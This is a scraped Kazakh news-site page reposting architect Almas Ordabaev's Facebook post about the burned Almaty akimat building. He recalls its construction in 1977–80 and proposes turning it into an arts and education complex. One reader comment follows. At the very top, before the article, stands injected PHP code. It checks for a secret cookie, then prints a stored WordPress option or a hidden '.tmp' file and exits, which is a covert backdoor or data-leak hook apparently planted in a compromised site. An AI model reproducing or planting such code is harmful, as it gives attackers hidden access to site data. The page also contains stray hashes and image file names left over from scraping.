if (isset($_COOKIE["BsIbuVOYEiveJFkpFamX1AFEH3OK4xrKIKkWV0cFmaxChmhI"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Что можно устроить в сгоревшем здании акимате г.Алматы после его восстановления?. - Better.kz
18.01.2022

Что можно устроить в сгоревшем здании акимате г.Алматы после его восстановления?.

Стена в Фейсбуке Almas Ordabaev
На прошлой неделе позвонила журналистка и попросила дать интервью по поводу здания акимата.
Задала несколько вопросов, в частности, о том, сносить его или ремонтировать.
a2ec4628b80366e67969a5838625018a

Девушка разбередила мою память и спровоцировала мысли о новом назначении здания.
В 1976 году я вернулся в современную архитектуру после шести лет работы в реставрации памятников. Володя Ким — гл. архитектор Алмаатагипрогора, с которым я работал в 60-х еще в Казгоре, сразу предложил место гл. архитектора 4-й мастерской, занимавшейся новым юго-восточным районом города совместно с планировочной мастерской. Это новый административный центр города с его Новой площадью, жилой район Самал и множество других объектов, включая Олимпийский спортивный комплекс.
Конечно, в такую большую работу постоянно пытались влезать Казгор и Гипроград. Гипрград, с агрессивными наскоками Васякина, институт отшивал, а вот Казгор, лоббируемый Госстроем и Сейдалиным, влез с брутальным сундуком госмузея.
Здание акимата — бывшего ЦК КПК строилось в 1977—1980 годах. Это самое большое административное здание в Казахстане площадью 35 тыс. кв. метров. Сначала планерки на объекте проводились раз в неделю, а в год его сдачи, когда велись отделочные работы — каждый день. Проводил планерки Андрей Григорьевич Статенин, опытный строитель и организатор. Десятки трестов и СМУ были заняты на стройке здания, инженерных объектов, благоустройстве территории. Задача нашего института заключалась в своевременном обеспечении работ проектной документацией.
272117057_6920376231369337_754121145142456826_n
272024410_6920376991369261_383153046847511746_n
Андрей Григорьевич не только не использовал традиционной строительной матерной лексики, но и никогда не повышал голоса. Но взгляд его на провинившегося начальника был так убедителен, что он не мог иметь никаких оправданий.
Директор наш, бывший проектировщик, превратившийся в заурядного функционера, от страха буквально накладывавший себе в штаны на планерках, стал посылать на них меня.
После планерок, длившихся от часа до двух с половиной, Андрей Григорьевич, отправив всех, заводил меня в буфетный закуток и наливал два полных стакана водки. Я же просил отлить половину из моего, оправдываясь тем, что мне надо еще работать с проектантами. Часть их была на объектах, другая в проектном институте. Вот почему я хорошо знаю здание акимата.
Несколько дней думал о том, чем занять это здание. Пришла идея создания научно-образовательного и культурного комплекса, состоящего из бывшего здания акимата (так!), бывшей резиденции президента, здания Института стратегических исследований. Центральный исторический музей и телекомплекс уже есть.
В здании акимата можно разместить теснящуюся Жургеневку и художественное училище, ныне прозябающее в убогих помещениях. Здесь же могут располагаться две-три, а может быть и больше, детские художественные школы с разными уклонами. Акимат же пусть остается там, где он разместился сейчас.
И надо сократить число захребетников. Резиденция может стать первым в Казахстане дизайн-центром с музеем. Простор и обилие зелени создадут впечатление прекрасного кампуса. А жилье студентов и преподавателей следует разместить в построенном универсальном здании на западной стороне улицы Желтоксан напротив западного фасада новой Жургеневки. Проект его, о котором я уже рассказывал, покажу в следующем посте.
Разумеется, могут быть различные варианты. Предлагайте! Но акимат не должен быть пупом в пространстве, которое впервые в нашей истории станет гуманным пространством.
***

Айгуль Омарова (комментарий под постом)
Поддерживаю! Принятие этого предложения означало бы бесповоротный курс на перемены в стране. Хорошо бы Г-ну президенту Токаеву подумать об этом.

Комментарии закрыты.